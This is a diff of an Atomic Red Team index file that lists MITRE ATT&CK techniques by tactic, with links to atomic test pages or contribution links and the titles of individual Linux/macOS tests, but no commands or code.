+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # command-and-control
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -330,6 +483,7 @@
   - Atomic Test #2: Base64 Encoded data (freebsd) [linux]
 - T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -357,7 +511,7 @@
 - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -401,12 +555,14 @@
   - Atomic Test #5: Bash session based keylogger [linux]
   - Atomic Test #6: SSHD PAM keylogger [linux]
   - Atomic Test #7: Auditd keylogger [linux]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1115 Clipboard Data](../../T1115/T1115.md)
   - Atomic Test #5: Add or copy content to clipboard with xClip [linux]
@@ -419,120 +575,42 @@
   - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
   - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
 - T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # lateral-movement
 - T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1021.004 Remote Services: SSH](../../T1021.004/T1021.004.md)
-  - Atomic Test #1: ESXi - Enable SSH via PowerCLI [linux]
-- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# privilege-escalation
-- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
-  - Atomic Test #1: Sudo usage [macos, linux]
-  - Atomic Test #2: Sudo usage (freebsd) [linux]
-  - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
-  - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
-  - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
-  - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
-  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
-  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-  - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
-  - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap EXIT [macos, linux]
-  - Atomic Test #2: Trap EXIT (freebsd) [linux]
-  - Atomic Test #3: Trap SIGINT [macos, linux]
-  - Atomic Test #4: Trap SIGINT (freebsd) [linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
-  - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
-  - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
-- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
-  - Atomic Test #1: Make and modify binary from C source [macos, linux]
-  - Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
-  - Atomic Test #3: Set a SetUID flag on file [macos, linux]
-  - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
-  - Atomic Test #5: Set a SetGID flag on file [macos, linux]
-  - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
-  - Atomic Test #7: Make and modify capabilities of a binary [linux]
-  - Atomic Test #8: Provide the SetUID capability to a file [linux]
-  - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
-  - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
-  - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
-  - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
-- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
-  - Atomic Test #1: Create Systemd Service and Timer [linux]
-  - Atomic Test #2: Create a user level transient systemd service and timer [linux]
-  - Atomic Test #3: Create a system level transient systemd service and timer [linux]
-- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
-  - Atomic Test #1: Add command to .bash_profile [macos, linux]
-  - Atomic Test #2: Add command to .bashrc [macos, linux]
-  - Atomic Test #3: Add command to .shrc [linux]
-  - Atomic Test #4: Append to the system shell profile [linux]
-  - Atomic Test #5: Append commands user shell profile [linux]
-  - Atomic Test #6: System shell profile scripts [linux]
-  - Atomic Test #7: Create/Append to .bash_logout [linux]
-- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
-  - Atomic Test #2: rc.common [linux]
-  - Atomic Test #3: rc.local [linux]
-- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
-  - Atomic Test #1: Create Systemd Service [linux]
-  - Atomic Test #2: Create SysV Service [linux]
-  - Atomic Test #3: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
-- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
-  - Atomic Test #2: At - Schedule a job [linux]
-- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
-  - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #11: Login as nobody (Linux) [linux]
-  - Atomic Test #12: Login as nobody (freebsd) [linux]
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
-  - Atomic Test #1: Malicious PAM rule [linux]
-  - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
-  - Atomic Test #3: Malicious PAM module [linux]
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
   - Atomic Test #3: Logging bash history to syslog [linux]
@@ -546,13 +624,10 @@
   - Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
-  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
-  - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
-  - Atomic Test #3: Dump individual process memory with Python (Local) [linux]
-  - Atomic Test #4: Capture Passwords with MimiPenguin [linux]
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
@@ -563,10 +638,14 @@
   - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
   - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
   - Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
   - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -578,18 +657,20 @@
   - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
   - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
   - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
-  - Atomic Test #1: Search Through Bash History [linux, macos]
-  - Atomic Test #2: Search Through sh History [linux]
 - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Find AWS credentials [macos, linux]
   - Atomic Test #3: Extract passwords with grep [linux, macos]
   - Atomic Test #6: Find and Access Github Credentials [linux, macos]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -599,16 +680,19 @@
   - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
   - Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
-  - Atomic Test #1: Access /etc/shadow (Local) [linux]
-  - Atomic Test #2: Access /etc/master.passwd (Local) [linux]
-  - Atomic Test #3: Access /etc/passwd (Local) [linux]
-  - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
-  - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # discovery
 - [T1033 System Owner/User Discovery](../../T1033/T1033.md)
@@ -616,6 +700,7 @@
 - [T1016.001 System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md)
   - Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
   - Atomic Test #23: Active Directory Domain Search [linux]
@@ -658,6 +743,7 @@
   - Atomic Test #26: FreeBSD List Kernel Modules [linux]
 - T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
   - Atomic Test #1: Delay execution with ping [linux, macos]
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
@@ -666,6 +752,7 @@
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
   - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
   - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
@@ -689,6 +776,7 @@
   - Atomic Test #4: Discover System Language with localectl [linux]
   - Atomic Test #5: Discover System Language by locale file [linux]
   - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1614 System Location Discovery](../../T1614/T1614.md)
   - Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
@@ -709,55 +797,6 @@
 - [T1124 System Time Discovery](../../T1124/T1124.md)
   - Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
 
-# execution
-- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
-  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
-  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-  - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
-  - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
-  - Atomic Test #1: Create Systemd Service and Timer [linux]
-  - Atomic Test #2: Create a user level transient systemd service and timer [linux]
-  - Atomic Test #3: Create a system level transient systemd service and timer [linux]
-- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
-  - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
-  - Atomic Test #2: Command-Line Interface [linux, macos]
-  - Atomic Test #3: Harvest SUID executable files [linux]
-  - Atomic Test #4: LinEnum tool execution [linux]
-  - Atomic Test #5: New script file in the tmp directory [linux]
-  - Atomic Test #6: What shell is running [linux]
-  - Atomic Test #7: What shells are available [linux]
-  - Atomic Test #8: Command line scripts [linux]
-  - Atomic Test #9: Obfuscated command line scripts [linux]
-  - Atomic Test #10: Change login shell [linux]
-  - Atomic Test #11: Environment variable scripts [linux]
-  - Atomic Test #12: Detecting pipe-to-shell [linux]
-  - Atomic Test #13: Current kernel information enumeration [linux]
-  - Atomic Test #14: Shell Creation using awk command [linux, macos]
-  - Atomic Test #15: Creating shell using cpan command [linux, macos]
-  - Atomic Test #16: Shell Creation using busybox command [linux]
-  - Atomic Test #17: emacs spawning an interactive system shell [linux, macos]
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
-  - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
-  - Atomic Test #2: Execute Python via scripts [linux]
-  - Atomic Test #3: Execute Python via Python executables [linux]
-  - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
-- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
